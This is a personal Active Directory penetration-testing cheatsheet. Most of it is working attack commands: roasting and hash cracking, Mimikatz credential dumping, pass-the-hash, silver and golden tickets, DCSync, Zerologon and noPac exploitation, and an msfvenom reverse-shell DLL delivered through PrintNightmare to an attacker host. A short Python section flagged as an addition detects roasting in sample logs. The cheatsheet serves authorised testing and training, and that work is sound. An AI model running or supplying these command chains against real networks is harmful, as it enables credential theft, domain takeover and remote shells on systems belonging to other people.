This is a cheatsheet of tools and commands that I use to pentest Active Directory. It includes Windows, Impacket and PowerView commands, how to use Bloodhound and popular exploits such as Zerologon and NO-PAC.
See local accounts
net user
See all of the accounts in the domain
net user /domain
Check if an account is a Domain Admin
net user <account-name> /domain
See groups in the AD domain
net group /domain
Sync the clock with the DC (Domain Controller).
ntpdate <dc-ip>
Load PowerView in the current PowerShell session
. .\PowerView.ps1
Information about the domain
Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
See password rules
(Get-DomainPolicy)."system access"
Information about users. Look for passwords/personal information in the description field.
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select description
Get-NetUser | select samaccountname
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties logoncount
Information about computers
Get-NetComputer
Get-NetComputer -FullData
Information about groups
Get-NetGroup
Get-NetGroup -GroupName <group-name>
Get-NetGroup -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Domain Admins"
See SMB shares
Invoke-ShareFinder
A few quick commands that I always use if I have no information about the machine
crackmapexec smb <ip>
crackmapexec smb <ip> -u '' -p ''
crackmapexec smb <ip> -u 'guest' -p ''
With a list of valid usernames and no passwords, you can check if Kerberos has pre-authentication disabled by ASREP-Roasting
impacket-GetNPUsers -format john -dc-ip <dc-ip> -usersfile <users-list> <name_of_domain>/<hostname>
or
python3 GetNPUsers.py <domain>/<user> -no-pass -dc-ip <dc-ip>
To crack the obtained hashes, save them in a file and give them to John. I usually use rockyou.txt to brute-force the passwords
john --wordlist=<passwords-file> <hashes-file>
Alternative
hashcat -m 18200 -a 0 <hashes-file> <passwords-file>
If you obtained any passwords, check them
crackmapexec smb <ip> -u <user> -p <password>
If they are valid, further enumerate the domain
crackmapexec smb <ip> -u <user> -p <password> --shares
crackmapexec smb <ip> -u <user> -p <password> --rid-brute
crackmapexec smb <ip> -u <user> -p <password> --users
crackmapexec smb <ip> -u <user> -p <password> --lsa
Try to connect using Windows Remote Management
crackmapexec winrm <ip> -u <user> -p <password>
Try to connect using pass-the-hash (the user needs to have administrative rights)
pth-winexe -U <domain>/<user>%<hash> //<ip> cmd
Kerberoasting: two different ways to perform this attack.
- From your attacking machine, using Impacket
impacket-GetUserSPNs -dc-ip <ip> <domain>/<user>
If successful
impacket-GetUserSPNs -dc-ip <ip> <domain>/<user> --request
To crack the hash
hashcat -m 13100 -a 0 <hash> <wordlist> --force
- On the target machine, using Mimikatz
Generate tickets in Powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<service>/<hostname>.<domain>.com'
klist
In Mimikatz
kerberos::list /export
Grab the tickets and crack them
python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <tickets>
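Both roasting techniques above (AS-REP roasting and Kerberoasting) leave a trace in the domain controller's Security log: a 4768 event with Pre-Authentication Type 0 (no pre-auth) and 4769 events requesting service tickets with RC4-HMAC (Ticket Encryption Type 0x17) for user-account SPNs. The following detection example is added here and is not part of the original cheatsheet; the event records are constructed samples in a simplified key=value form (not real log exports), and the field names mirror those of the Security log.

```python
from dataclasses import dataclass

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC in 4768/4769 events

# Constructed sample records in a simplified "key=value;" form (not real log exports).
SAMPLE_EVENTS = [
    "EventID=4768;TargetUserName=svc_backup;PreAuthType=0;TicketEncryptionType=0x17;IpAddress=10.0.0.50",
    "EventID=4768;TargetUserName=alice;PreAuthType=2;TicketEncryptionType=0x12;IpAddress=10.0.0.21",
    "EventID=4769;TargetUserName=alice@CORP.LOCAL;ServiceName=svc_sql;TicketEncryptionType=0x17;IpAddress=10.0.0.50",
    "EventID=4769;TargetUserName=alice@CORP.LOCAL;ServiceName=WS01$;TicketEncryptionType=0x17;IpAddress=10.0.0.21",
    "EventID=4769;TargetUserName=bob@CORP.LOCAL;ServiceName=krbtgt;TicketEncryptionType=0x12;IpAddress=10.0.0.22",
]

@dataclass(frozen=True)
class Finding:
    technique: str   # "asrep-roast" or "kerberoast"
    account: str     # account whose key material was exposed in the reply
    source_ip: str   # client that sent the request

def parse_event(line):
    """Split a 'key=value;key=value' record into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().strip(";").split(";") if "=" in kv)

def classify(ev):
    """Return a Finding for roasting-related patterns, else None."""
    etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
    if ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0" and etype == RC4_HMAC:
        # AS-REP issued without pre-authentication: the reply can be cracked offline.
        return Finding("asrep-roast", ev["TargetUserName"], ev.get("IpAddress", "?"))
    if ev.get("EventID") == "4769" and etype == RC4_HMAC:
        svc = ev.get("ServiceName", "")
        # Machine accounts ($) and the TGS itself (krbtgt) are not Kerberoast targets.
        if not svc.endswith("$") and svc.lower() != "krbtgt":
            return Finding("kerberoast", svc, ev.get("IpAddress", "?"))
    return None

def detect(lines):
    return [f for f in (classify(parse_event(line)) for line in lines) if f]

def roasting_sources(lines, threshold=2):
    """IPs with at least `threshold` findings: one host pulling many RC4 tickets is the usual signature."""
    counts = {}
    for f in detect(lines):
        counts[f.source_ip] = counts.get(f.source_ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS), roasting_sources(SAMPLE_EVENTS))
```

Accounts that keep showing up under "kerberoast" are candidates for AES-only keys or a gMSA; "asrep-roast" findings point at accounts with "Do not require Kerberos preauthentication" set.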
If you managed to get access on the machine and you are able to transfer Mimikatz, you can use the following commands.
privilege::debug
Dump credentials of all logged-in users
sekurlsa::logonpasswords
lsadump::lsa /patch
Dump the SAM database (equivalent to hashdump in a Meterpreter shell)
token::elevate
lsadump::sam
Overpass-the-hash
sekurlsa::pth /user:<username> /domain:<domain-name> /ntlm:<ntlm-hash> /run:PowerShell.exe
Pass-the-ticket (silver ticket)
Get the SID of the user
whoami /user
In Mimikatz
kerberos::purge
kerberos::golden /user:<username> /domain:<domain-name> /sid:<sid> /target:<target-fqdn> /service:<service> /rc4:<rc4hash> /ptt
If you have a silver ticket, connect using Impacket
export KRB5CCNAME=<path-to-silver-ticket>
impacket-wmiexec -k -no-pass <username>@<domain>
Golden ticket
If we get the krbtgt hash (the password hash of the KRBTGT domain account), we can create our own golden tickets (custom TGTs).
Get the krbtgt
privilege::debug
lsadump::lsa /patch
kerberos::purge
Create a golden ticket
kerberos::golden /user:<fake-username> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt-hash> /ptt
Launch a new cmd
misc::cmd
Use PsExec to escalate privileges
psexec.exe \\<dc-name> cmd.exe
DC-SYNC
lsadump::dcsync /user:Administrator
BloodHound needs an ingestor (collector) to gather data from the domain; the resulting files are then uploaded into the BloodHound application running on your attacking machine.
Bloodhound-Python
bloodhound-python -c All -u <user> -p <password> -gc '<hostname>.<domain-name>' -dc '<hostname>.<domain-name>' -d '<domain-name>' -ns <dc-ip>
Sharphound
You can use Sharphound two ways.
- Transfer the .exe file (which you can download from here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) on the target machine and run it with the following command
SharpHound.exe -c All
- Transfer the Sharphound.ps1 Powershell script on the target machine and run it
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain <domain-name> -ZipFileName loot.zip
This exploit should be used very carefully and with the guarantee that it can be reversed. It changes the domain controller's machine account password and interrupts communication with other computers in the domain.
To test the vulnerability without exploiting it, I used the following script: https://github.com/SecuraBV/CVE-2020-1472
python3 zerologon_tester.py <DC-name> <DC-ip>
To exploit it, you can find the Zerologon exploit here: https://github.com/dirkjanm/CVE-2020-1472, as well as restoration steps.
python3 cve-2020-1472-exploit.py <DC-name> <DC-ip>
Get all of the information (usernames + hashes)
impacket-secretsdump -just-dc <domain>/<DC-name>$@<DC-ip>
To restore
Get the lanman_hash:ntlm_hash from the output of the previous command
impacket-secretsdump administrator@<DC-ip> -hashes <lanman_hash:ntlm_hash>
Obtain the hex-encoded plaintext password (plain_password_hex) from the output of the previous command
python3 restorepassword.py <domain>/<DC-name>@<DC-name> -target-ip <DC-ip> -hexpass <hex-encoded-password>
The NO-PAC exploit (sam-the-admin) is possible if you have any valid credentials of a user in the Active Directory domain. You can find the exploit here: https://github.com/WazeHell/sam-the-admin
python3 sam_the_admin.py -dc-ip <DC-ip> <domain>/<user>:<password>
You can find the exploit here: https://github.com/cube0x0/CVE-2021-1675
For this exploit, you need valid user credentials.
Check if the system is vulnerable:
rpcdump.py <target-ip> | egrep 'MS-RPRN|MS-PAR'
If you get Print System Asynchronous Remote Protocol & Print System Remote Protocol in the output, it is vulnerable.
Create a .dll file to execute the reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll LHOST=<attacking-machine-ip> LPORT=<listener-port> > shell.dll
Start a listener on the port used in the command.
Host the file on Samba
smbserver.py share . -smb2support
python3 CVE-2021-1675.py <domain>/<user>:<password>@<target-ip> '\\<attacking-machine-ip>\share\shell.dll'
Some cheatsheets that I've used in the past and I've found very useful are:
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://gist.github.com/Rajchowdhury420/da4d12a3db13aa5232fcd4e7d96ec6a1
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a